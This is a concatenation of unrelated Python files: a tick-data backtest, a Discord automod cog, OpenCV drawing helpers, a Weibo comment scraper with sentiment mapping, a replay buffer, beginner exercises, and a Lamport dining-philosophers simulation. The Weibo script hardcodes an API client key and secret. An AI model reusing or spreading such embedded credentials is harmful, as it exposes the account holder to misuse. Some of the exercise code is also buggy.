from_string = datetime.datetime.strptime(from_string, '%H:%M:%S')
from_string = datetime.time(from_string.hour, from_string.minute, from_string.second)
return from_string
entry_time = string_to_time(entry_time)
exit_time_start_range = string_to_time(exit_time_start_range)
exit_time_end_range = string_to_time(exit_time_end_range)
def target_price(entry_price, ticks_to_target, tick):
return entry_price + (ticks_to_target * tick)
def stop_price(entry_price, ticks_to_stop, tick):
return entry_price - (ticks_to_stop * tick)
def timestamp_index_to_time(timestamp):
timestamp = datetime.datetime.strptime(timestamp, '%H:%M:%S')
timestamp = datetime.time(timestamp.hour, timestamp.minute, timestamp.second)
return timestamp
# targetPrice = targetPrice(entryPrice, ticksToTarget, tick)
# plt.style.use('seaborn')
# mpl.rcParams['font.family'] = 'serif'
data = pd.read_csv('C:/ticks.csv', index_col=0, parse_dates=True, decimal=',')
data = pd.DataFrame(data['Last'], dtype=float)
data.dropna(inplace=True)
# data.info()
# print(data.tail())
# print(data.head())
data['Time'] = data.index.time
# data['Position'] = np.where(data['Time'] > entry_time, 1, 0)
data['Position'] = np.where((data.index.time > entry_time) | (data.index.time < exit_time_start_range), 1, 0)
data['Buy'] = np.where((data['Position'] == 1) & (data['Position'].shift(1) == 0), 1, 0)
# global i
i = 1
buy_date = []
for row in data[data['Buy'] == 1].itertuples():
# row['Buy'] = i
print(row)
# row[4] = i
data.loc[row[0], 'Buy'] = i
buy_date.append(row[0])
print()
print(row[4])
if i > 1:
# entry_price = row[1]
dd = data[(data.index > buy_date[i-2]) & (data.index < buy_date[i-1]) & (data['Position'] == 1)].copy()
# ddd = dd.loc[:'Last', 'Position', 'Buy']
dd['Position'] = i-1
print(dd.tail())
i = i + 1
print(i)
# dd = data[(data.index > buy_date[i-2]) & (data.index < buy_date[i-1]) & (data['Position'] == 1)].copy()
# dd['Position'] = i-1
# print(dd.tail())
print(data[data['Buy'] > 0])
print(data.tail())
# !!data['BS Counter'] = np.where((data['Position'] == 1) & (data['Position'].shift(1) == 0), 1, 0)
# data['Buy signal'] = np.where((data.index.time > entry_time) & (data.index.shift(1).time <= entry_time), 1, 0)
# data['Position'] = np.where(data['Timestamp'] > entryTime, 1, 0)
# data['rets'] = np.log(data / data.shift(1))
# data['vola'] = data['rets']
# data['vola'] = data['rets'].rolling(252).std() * np.sqrt(252)
# data[['Last', 'vola']].plot(subplots=True, figsize=(10, 6));
# mpl.show()
# data.info()
print(data.head(180))
|
from GompeiFunctions import load_json, save_json
from Permissions import administrator_perms
from discord.ext import commands
import Config
import pytimeparse
import os
class Automod(commands.Cog):
"""
Automatic moderation handler
"""
def __init__(self, bot):
self.bot = bot
@commands.group(pass_context=True, case_insensitive=True, aliases=["am"])
@commands.check(administrator_perms)
@commands.guild_only()
async def automod(self, ctx):
"""
Automod command group
Usage: .automod <subcommand>
:param ctx: Context object
"""
if ctx.invoked_subcommand is None:
await ctx.send("Not a valid automod command")
@automod.command(aliases=["i"])
async def info(self, ctx):
"""
Sends automod info
:param ctx: Context object
"""
response = ""
await ctx.send(response)
# Message rate commands
@automod.group(pass_context=True, case_insensitive=True, aliases=["messageRate", "msgRate", "msgR"])
async def message_rate(self, ctx):
"""
Message rate command group
Usage: .automod messageRate <subcommand>
:param ctx: Context object
"""
if ctx.invoked_subcommand is None:
await ctx.send("Not a valid message rate command")
@message_rate.command(pass_context=True, name="disable")
async def message_rate_disable(self, ctx):
"""
Disables message rate checks
Usage: .automod messageRate disable
:param ctx: Context object
"""
Config.automod_setting_disable("message_rate")
await ctx.send("Disabled message rate limit")
@message_rate.command(pass_context=True, name="enable")
async def message_rate_enable(self, ctx):
"""
Enables message rate checks
Usage: .automod messageRate enable
:param ctx: Context object
"""
Config.automod_setting_enable("message_rate")
await ctx.send("Enabled message rate limit")
@message_rate.command(pass_context=True, name="set")
async def message_rate_set_rate(self, ctx, rate_limit):
"""
Sets the rate limit for messages
Usage: .automod messageRate set <rateLimit>
:param ctx: Context object
:param rate_limit: Rate limit in format <number>/<time>
"""
try:
number = int(rate_limit[:rate_limit.find("/")])
except ValueError:
await ctx.send("Not a valid rate limit format. Format: `<number>/<time>`")
return
seconds = pytimeparse.parse(rate_limit[rate_limit.find("/") + 1:])
if seconds is None:
await ctx.send("Not a valid time")
return
Config.automod_set_message_rate_limit(number, seconds)
await ctx.send("Updated message rate limit to " + str(number) + " messages per " + str(seconds) + " seconds")
@message_rate.command(pass_context=True, name="setPunishment")
async def message_rate_set_punishment(self, ctx, *, punishment: str):
"""
Sets the punishment for breaking the message rate
Usage: .automod messageRate punishment
:param ctx: Context object
:param punishment: Punishment for member
"""
# IMPLEMENT
return
# Bad words commands
@automod.group(pass_context=True, case_insensitive=True, aliases=["badWords", "badWord"])
async def bad_words(self, ctx):
"""
Bad words command group
Usage: .automod badWords <subcommand>
:param ctx: Context object
"""
if ctx.invoked_subcommand is None:
await ctx.send("Not a valid bad words command")
@bad_words.command(pass_context=True, name="disable")
async def bad_words_disable(self, ctx):
"""
Disables bad words checks
Usage: .automod badWords enable
:param ctx: context object
"""
Config.automod_setting_disable("bad_words")
await ctx.send("Disabled bad word filtering")
@bad_words.command(pass_context=True, name="enable")
async def bad_words_enable(self, ctx):
"""
Enables bad words checks
Usage: .automod badWords enable
:param ctx: Context object
"""
Config.automod_setting_enable("bad_words")
await ctx.send("Enabled bad word filtering")
# Mention spam commands
@automod.group(pass_context=True, case_insensitive=True)
async def mentions(self, ctx):
"""
Mention spam command group
Usage: .automod mentions <subcommand>
:param ctx: Context object
"""
if ctx.invoked_subcommand is None:
await ctx.send("Not a valid mention spam command")
@mentions.command(pass_context=True, name="disable")
async def mentions_disable(self, ctx):
"""
Disables mention spam checks
Usage: .automod mentions enable
:param ctx: Context object
"""
Config.automod_setting_disable("mention_spam")
await ctx.send("Disabled mention spam checking")
@mentions.command(pass_context=True, name="enable")
async def mentions_enable(self, ctx):
"""
Enables mention spam checks
Usage: .automod mentions enable
:param ctx: Context object
"""
Config.automod_setting_enable("mention_spam")
await ctx.send("Enabled mention spam checking")
# Whitespace spam commands
@automod.group(pass_context=True, case_insensitive=True)
async def whitespace(self, ctx):
"""
Whitespace spam command group
Usage: .automod whitespace <subcommand>
:param ctx: Context object
"""
if ctx.invoked_subcommand is None:
await ctx.send("Not a valid whitespace spam command")
@whitespace.command(pass_context=True, name="disable")
async def whitespace_disable(self, ctx):
"""
Disables whitespace spam checks
Usage: .automod whitespace enable
:param ctx: Context object
"""
Config.automod_setting_disable("whitespace")
await ctx.send("Disabled whitespace spam checking")
@whitespace.command(pass_context=True, name="enable")
async def whitespace_enable(self, ctx):
"""
Enables whitespace spam checks
Usage: .automod whitespace enable
:param ctx: Context object
"""
Config.automod_setting_enable("whitespace")
await ctx.send("Enabled whitespace spam checking")
# Ghost ping commands
@automod.group(pass_context=True, case_insensitive=True, aliases=["ghostPing"])
async def ghost_ping(self, ctx):
"""
Ghost ping command group
Usage: .automod ghostPing <subcommand>
:param ctx: Context object
"""
if ctx.invoked_subcommand is None:
await ctx.send("Not a valid ghost ping command")
@automod.command(pass_context=True, name="disable")
async def ghost_ping_disable(self, ctx):
"""
Disables ghost ping checks
Usage: .automod ghostPing disable
:param ctx: Context object
"""
Config.automod_setting_disable("ghost_ping")
await ctx.send("Disabled ghost ping checking")
@automod.command(pass_context=True, name="enable")
async def ghost_ping_enable(self, ctx):
"""
Disables ghost ping checks
Usage: .automod ghostPing enable
:param ctx: Context object
"""
Config.automod_setting_enable("ghost_ping")
await ctx.send("Enabled ghost ping checking")
# Listeners
@commands.Cog.listener()
async def on_message_delete(self, message):
# Check for ghost pinging
return
@commands.Cog.listener()
async def on_message(self, message):
# Check for excessive pings, check for rate limit, check for excessive white space, check for blacklisted phrases/words
return
|
import cv2
import numpy as np
INPUT_PATH = 'input/'
OUTPUT_PATH = 'output/'
POINT_MAPS_PATH = 'point_maps/'
FRAMES_PATH = 'frames/'
BLUE = (255, 0, 0)
GREEN = (0, 255, 0)
RED = (0, 0, 255)
def drawInliersOutliers(image, point_map, inliers):
"""
inliers: set of (x1, y1) points
"""
rows, cols = image.shape
retImage = np.zeros((rows, cols, 3), dtype='uint8')
retImage[:, :, :] = np.dstack([image] * 3)
# Draw circles on top of the lines
for x1, y1, x2, y2 in point_map:
point = (int(x1), int(y1))
color = GREEN if (x1, y1, x2, y2) in inliers else RED
cv2.circle(retImage, point, 4, color, 1)
return retImage
def drawMatches(image1, image2, point_map, inliers=None, max_points=1000):
"""
inliers: set of (x1, y1) points
"""
rows1, cols1 = image1.shape
rows2, cols2 = image2.shape
matchImage = np.zeros((max(rows1, rows2), cols1 + cols2, 3), dtype='uint8')
matchImage[:rows1, :cols1, :] = np.dstack([image1] * 3)
matchImage[:rows2, cols1:cols1 + cols2, :] = np.dstack([image2] * 3)
small_point_map = [point_map[i] for i in np.random.choice(len(point_map), max_points)]
# draw lines
for x1, y1, x2, y2 in small_point_map:
point1 = (int(x1), int(y1))
point2 = (int(x2 + image1.shape[1]), int(y2))
color = BLUE if inliers is None else (
GREEN if (x1, y1, x2, y2) in inliers else RED)
cv2.line(matchImage, point1, point2, color, 1)
# Draw circles on top of the lines
for x1, y1, x2, y2 in small_point_map:
point1 = (int(x1), int(y1))
point2 = (int(x2 + image1.shape[1]), int(y2))
cv2.circle(matchImage, point1, 5, BLUE, 1)
cv2.circle(matchImage, point2, 5, BLUE, 1)
return matchImage |
from weibopy import WeiboOauth2,WeiboClient
import webbrowser
import json
import re
import time
from collections import defaultdict
from snownlp import SnowNLP
import pandas as pd
import echarts_countries_pypkg,echarts_china_provinces_pypkg
from pyecharts import Map
client_key='3536121960'
client_secret='29a7cb9342f584e7a2fda64124ec01cf'
redirect_url='https://api.weibo.com/oauth2/default.html'
auth=WeiboOauth2(client_key,client_secret,redirect_url)
webbrowser.open(auth.authorize_url)
code=input('the code is\n')
token=auth.auth_access(code)
client=WeiboClient(token['access_token'])
#获取的内容处理:1.删去回复
#2.按地域划分内容
province_list=defaultdict(list)
comment_text_list=[]
for i in range(1,40):
try:
result=client.get(suffix='comments/show.json',params={'id':4401542310862649, 'count': 200, 'page': 1})
comments=result['comments']
if not len(comments):
break
for comment in comments:
text = re.sub('回复.*?:', '', str(comment['text']))
province=comment['user']['province']
province_list[province].append(text)
comment_text_list.append(text)
with open('./tep1.txt','a+',encoding='utf-8') as f:
f.write(text+'\n')
print('已抓取评论 {} 条'.format(len(comment_text_list)))
time.sleep(1)
except:
print('something went wrong')
provinces={}
results=client.get(suffix='common/get_province.json',params={'country':'001'})
for prov in results:
for code,name in prov.items():
provinces[code]=name
propd=pd.Series(provinces)
propd.to_csv('./pron.csv')
positives={}
for province_code,comments in province_list.items():
sentiment_list=[]
for text in comments: #comments is a list
s=SnowNLP(text)
sentiment_list.append(s.sentiments)
#each province's attitude
positive_number=sum(sentiment_list)
positive=positive_number/len(sentiment_list)
#print(positive)
province_code='0010'+str(province_code)
if province_code in provinces:
province_name=provinces[province_code]
positives[province_name]=positive
ab=pd.Series(positives)
ab.to_csv('./test.csv')
mostp=ab.max()
positives=ab/mostp*100
#print(province_list)
#print(positives)
keys=list(positives.keys())
values=list(positives.values)
map=Map('surpriseme',width=1200,height=600)
map.add('positives',keys,values,visual_range=[0,100],maptype='china'
,is_visualmap=True,is_label_show=True,visual_text_color='#000')
map.render('test.html')
'''
with open('./tep.json','a+',encoding='utf-8') as f :
f.write(json.dumps(result,ensure_ascii=False))
print(result)
'''
|
from collections import deque
import random
class ReplayBuffer(object):
def __init__(self, buffer_size):
self.buffer_size = buffer_size
self.num_experiences = 0
self.buffer = deque()
def getBatch(self, batch_size):
if self.num_experiences < batch_size:
return random.sample(self.buffer, self.num_experiences)
else:
return random.sample(self.buffer, batch_size)
def add(self, obs, action, reward, new_obs, matrix, next_matrix, done):
experience = (obs, action, reward, new_obs, matrix, next_matrix, done)
if self.num_experiences < self.buffer_size:
self.buffer.append(experience)
self.num_experiences += 1
else:
self.buffer.popleft()
self.buffer.append(experience) |
# check tooCloseToCarInFront
def isTooCloseToCarInFront(carLineArray, c):
for row in carLineArray:
if row[0] == c.line:
if 50 > (c.x - row[1].x) > 0:
return True
return False
# check collision 4line
def isCarCollided(carLineArray, c):
for row in carLineArray:
if row[0] == c.line:
if 35 > (c.x - row[1].x) > 0:
return True
elif row[2] and 60 > c.x - row[1].x > 0:
return True
return False
# check collision left road
def line56IsCarCollided(carLineArray, c):
for row in carLineArray:
if row[0] == c.line:
if 40 > (c.x - row[1].x) > 0 and 5 > c.y - row[1].y > -5:
return True
return False
def pedLightIsWalking(pedArray, pedStart0YAry):
for ped in pedArray:
if ped.y <= pedStart0YAry[0] and ped.pedStartNum == 1 and ped.y != pedStart0YAry[1]:
return True
if ped.y >= pedStart0YAry[1] and ped.pedStartNum == 0 and ped.y != pedStart0YAry[0]:
return True
return False
|
line_break = "-----------------------------------------------------------------------------------"
students = {
'cohort1': 34,
'cohort2': 42,
'cohort3': 22
}
# function- display name and number or each student
def display_name_and_num(dict_name):
for student, number in dict_name.items():
print(f'{student}: {number} students')
# display_name_and_num(students)
# -----------------------------------------------------------------------------------
# 10.3 -
# ----------------------------------------------------------------------------------- e
# add 'cohort4' : 43 to students
students['cohort4'] = 43
# display_name_and_num(students)
# -----------------------------------------------------------------------------------
# 10.4 -
# ----------------------------------------------------------------------------------- e
# display names from students dictionary
def display_name(dict_name):
for name in dict_name:
print(name)
# output all the cohort names
display_name(students.keys())
# -----------------------------------------------------------------------------------
# 10.5 -
# ----------------------------------------------------------------------------------- e
def expand_class(class_list):
# for every student number in class list
for student, number in class_list.items():
# increase the student number by 5%
number += number * 0.05
print(student, number)
# display results
# expand_class(students)
# -----------------------------------------------------------------------------------
# 10.6 -
# ----------------------------------------------------------------------------------- e
# Delete the 2nd cohort and redisplay the dictionary.
# students.pop('cohort2')
# display_name_and_num(students)
# -----------------------------------------------------------------------------------
# 10.7 -
# -----------------------------------------------------------------------------------
# get the total number of students in all cohorts using a for loop
def get_total_students(dict_name):
for student, number in dict_name.items():
number += number
return number
print("The total number of students is: {} ".format(get_total_students(students)))
|
#Sum and Product
def calculate_sum(number:int):
return int((int(number)*(int(number) + 1)/ 2))
def calculate_product(number:int):
summa = 1
for x in range(1,number+1):
summa *= x
return summa
def menu():
print("1: Compute the sum of 1..n")
print("2: Compute the product of 1..n")
print("9: Quit")
def get_choice() -> int:
try:
choice = int(input("Choice: "))
return choice
except ValueError:
return None
def number() -> int:
try:
number = int(input("Enter value for n: "))
return number
print(number)
except:
return None
#Driver code
choice = 0
while choice != 9:
menu()
choice = get_choice()
if choice == None:
continue
elif choice == 9:
continue
elif choice == 1:
number_n = number()
if number_n == None:
continue
print(f"The result is: {calculate_sum(number_n)}")
elif choice == 2:
number_n = number()
if number_n == None:
continue
print(f"The result is: {calculate_product(number_n)}") |
class csr_matrix(arg1, shape=None, dtype=None, copy=False): # scipy.sparse.csr_matrix
'''
Compressed Sparse Row matrix
'''
|
"""
Problem pet filozofa
Problem pet filozofa. Filozofi obavljaju samo dvije različite aktivnosti: misle ili jedu.
To rade na poseban način. Na jednom okruglom stolu nalazi se pet tanjura te pet
štapića (između svaka dva tanjura po jedan). Filozof prilazi stolu, uzima lijevi štapić,
pa desni te jede. Zatim vraća štapiće na stol i odlazi misliti.
Ako rad filozofa predstavimo jednim zadatkom onda se on može opisati na sljedeći način:
filozof i
ponavljati
misliti;
jesti;
do zauvijek;
Slika 1. Pseudokod zadatka kojeg obavlja proces filozof
Zadatak
Potrebno je pravilno sinkronizirati rad pet procesa filozofa koristeći:
- Lamportov raspodijeljeni protokol (rješavaju studenti čija je predzadnja znamenka JMBAG parna) ili
Svi procesi ispisuju poruku koju šalju i poruku koju primaju.
Sve što u zadatku nije zadano, riješiti na proizvoljan način.
"""
from typing import Optional, Any
'''
Algorithm
Requesting process
Pushing its request in its own queue (ordered by time stamps)
Sending a request to every node.
Waiting for replies from all other nodes.
If own request is at the head of its queue and all replies have been received, enter critical section.
Upon exiting the critical section, remove its request from the queue and send a release message to every process.
Other processes
After receiving a request, pushing the request in its own request queue (ordered by time stamps) and reply with a time stamp.
After receiving release message, remove the corresponding request from its own request queue.
'''
from multiprocessing import Process, Pipe
from multiprocessing.connection import Connection
from itertools import combinations
from random import shuffle, randint
from queue import PriorityQueue, Queue
from heapq import heappush, heappop
from time import time, sleep
class PeekyQueue(PriorityQueue):
"""
def _init(self, maxsize):
self.queue = []
def _qsize(self):
return len(self.queue)
def _put(self, item):
heappush(self.queue, item)
def _get(self):
return heappop(self.queue)
"""
def peek(self):
# return self.queue[0]
elem = self.get()
self.put(elem)
return elem
def remove(self, item):
elems = []
while not self.empty():
elems.append(self.get())
elems.remove(item)
for e in elems:
self.put(e)
class IndexedConnection(Connection):
def __init__(self, connection, id) -> None:
self.connection = connection
self.id = id
def close(self) -> None:
self.connection.close()
def fileno(self) -> int:
return self.connection.fileno()
def poll(self, timeout: Optional[float] = ...) -> bool:
return self.connection.poll(timeout)
def recv(self) -> Any:
return self.connection.recv()
def recv_bytes(self, maxlength: Optional[int] = ...) -> bytes:
return self.connection.recv_bytes(maxlength)
def recv_bytes_into(self, buf: Any, offset: int = ...) -> int:
return self.connection.recv_bytes_into(buf, offset)
def send(self, obj: Any) -> None:
self.connection.send(obj)
def send_bytes(self, buf: bytes, offset: int = ..., size: Optional[int] = ...) -> None:
self.connection.send_bytes(buf, offset, size)
class Type(object):
request = 1
response = 2
exit = 3
release = 4
@staticmethod
def decode(index):
if index == 1:
return "request"
elif index == 2:
return "response"
elif index == 3:
return "exit"
elif index == 4:
return "release"
else:
return "unknown"
N = 5
start = time()
time_to_run = 1000 # s
class Message(object):
def __init__(self, type, id, timestamp, target_id) -> None:
super().__init__()
self.type = type
self.id = id
self.timestamp = timestamp
self.target_id = target_id
def __repr__(self) -> str:
return f"Type: {Type.decode(self.type)}, Id: {self.id}, Clock: {self.timestamp}, Target: {self.target_id}"
def __eq__(self, other):
return self.id == other.id and self.type == other.type and self.target_id == other.target_id
def __ne__(self, other):
return self.id != other.id or self.type != other.type or self.target_id != other.target_id
def __lt__(self, other):
return self.id < other.id if self.timestamp == other.timestamp else self.timestamp < other.timestamp
def request_resource(message: Message, my_id: int, read_pipe: Connection, write_pipes: [Connection],
r_qs: {int: PeekyQueue}, timestamp):
timestamp += 1
r_q = r_qs[message.target_id]
r_q.put(message)
for pipe in write_pipes:
pipe.send(message)
print("Philosopher(%d) sending message: (%s) to %d" % (my_id, str(message), pipe.id), flush=True)
responded = 0
N = len(write_pipes) + 1
# print(N, flush=True)
while not (responded >= N - 1 and r_q.peek() == message):
if responded == N - 1:
# print(r_q.peek(), message, r_q.peek() == message, flush=True)
# r_q_p = []
# while not r_q.empty():
# r_q_p.append(r_q.get())
# for r in r_q_p:
# r_q.put(r)
# print([e for e in r_q_p], r_q.peek(), flush=True)
# print([i for i in len(r_q.queue)], r_q.peek(), flush=True)
pass
response = read_pipe.recv()
print("Philosopher(%d) reading message: (%s)" % (my_id, str(response)), flush=True)
if response.type == Type.request:
timestamp = max(timestamp, response.timestamp) + 1
r_qs[response.target_id].put(response)
new_msg = Message(Type.response, my_id, timestamp, response.target_id)
print("Philosopher(%d) sending message: (%s) to %d" % (my_id, str(new_msg), response.id), flush=True)
list(filter(lambda pipe: pipe.id == response.id, write_pipes))[0].send(new_msg)
elif response.type == Type.response:
responded += 1
elif response.type == Type.release:
# timestamp = max(timestamp, response.timestamp) + 1
r_qs[response.target_id].remove(Message(Type.request, response.id, response.timestamp, response.target_id))
# print(r_q.peek(), message, r_q.peek() == message, r_q.peek() == message, flush=True)
# r_q_p = []
# while not r_q.empty():
# r_q_p.append(r_q.get())
# for r in r_q_p:
# r_q.put(r)
# print([e for e in r_q_p], r_q.peek(), message, flush=True)
# r_q.remove(message)
return timestamp
def release_resource(message: Message, my_id: int, read_pipe: Connection, write_pipes: [Connection],
r_qs: {int: PeekyQueue}):
r_q = r_qs[message.target_id]
r_q.remove(message)
release_message = Message(Type.release, my_id, message.timestamp, message.target_id)
for pipe in write_pipes:
pipe.send(release_message)
print("Philosopher(%d) sending message: (%s) to %d" % (my_id, str(release_message), pipe.id), flush=True)
def philosopher(id, read_pipe, write_pipes):
my_id = id
print("Philosopher(%d) started" % (my_id,), flush=True)
# pq = PeekyQueue()
# r_qs = {i: pq for i in range(-1, N)}
r_qs = {i: PeekyQueue() for i in range(-1, N)}
timestamp = randint(0, 5)
while time() - start < time_to_run:
# print("before", id, timestamp)
# message_left = Message(Type.request, my_id, timestamp, (my_id - 1) % N)
# timestamp = request_resource(message_left, my_id, read_pipe, write_pipes, r_qs, timestamp)
# print("Philosopher(%d) got %d at %d" % (my_id, message_left.target_id, time()), flush=True)
# print("mid", id, timestamp)
# message_right = Message(Type.request, my_id, timestamp, my_id % N)
# timestamp = request_resource(message_right, my_id, read_pipe, write_pipes, r_qs, timestamp)
# print("Philosopher(%d) got %d at %d" % (my_id, message_right.target_id, time()), flush=True)
# print("after", id, timestamp)
message_table = Message(Type.request, my_id, timestamp, -1)
timestamp = request_resource(message_table, my_id, read_pipe, write_pipes, r_qs, timestamp) # approach table
print("Philosopher(%d) got %d at %d" % (my_id, message_table.target_id, time()), flush=True)
from random import gauss
sleep(gauss(1, 0.01))
f = open('eats-%d.txt' % id, mode='a+')
msg = ['Philosopher(%d) eating %f\n' % (my_id, time())]
print(msg, flush=True)
f.writelines(msg)
f.close()
sleep(gauss(1, 0.01))
print("Philosopher(%d) releasing %d at %d" % (my_id, message_table.target_id, time()), flush=True)
release_resource(message_table, my_id, read_pipe, write_pipes, r_qs)
#
# release_resource(message_right, my_id, read_pipe, write_pipes, r_qs)
# release_resource(message_left, my_id, read_pipe, write_pipes, r_qs)
print("Philosopher(%d) finished" % (my_id,), flush=True)
def main():
# pipes = {}
# for i, j in combinations(range(N), 2):
# pipes[(i, j)] = Pipe()
pipes = [Pipe() for i in range(N)]
processes = []
for i in range(N):
f = open('eats-%d.txt' % i, mode='w+')
f.close()
p = Process(target=philosopher, args=(
i,
[IndexedConnection(pipe[0], id) for id, pipe in enumerate(pipes) if id == i][0],
[IndexedConnection(pipe[1], id) for id, pipe in enumerate(pipes) if id == (i + 1) % N or id == (i - 1) % N],
# [IndexedConnection(pipe[1], id) for id, pipe in enumerate(pipes) if id == (i + 1) % N or id == (i - 1) % N or id == (i + 2) % N or id == (i - 2) % N],
# [IndexedConnection(pipe[1], id) for id, pipe in enumerate(pipes) if id != i],
))
processes.append(p)
order = [i for i in range(N)]
shuffle(order)
print(order, flush=True)
for i in order:
processes[i].start()
sleep(0.1)
for p in processes:
p.join()
print("Finished", flush=True)
def test():
pipeout, pipein = Pipe()
p = Process(target=philosopher, args=(pipeout,))
p.start()
print('Sending message to pipe', flush=True)
pipein.send([42, None, 'text'])
p.join()
pipein.close()
print('Closed writing pipe', flush=True)
def merge():
import re
reg = re.compile('\d+\.\d+')
pq = PeekyQueue()
for name in ['eats-%d.txt' % i for i in range(N)]:
f = open(name, 'r+')
for line in f.readlines():
line = line.strip()
value = reg.findall(line)[0]
pq.put((value, line))
while not pq.empty():
print(pq.get()[1], flush=True)
if __name__ == '__main__':
# main()
merge()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.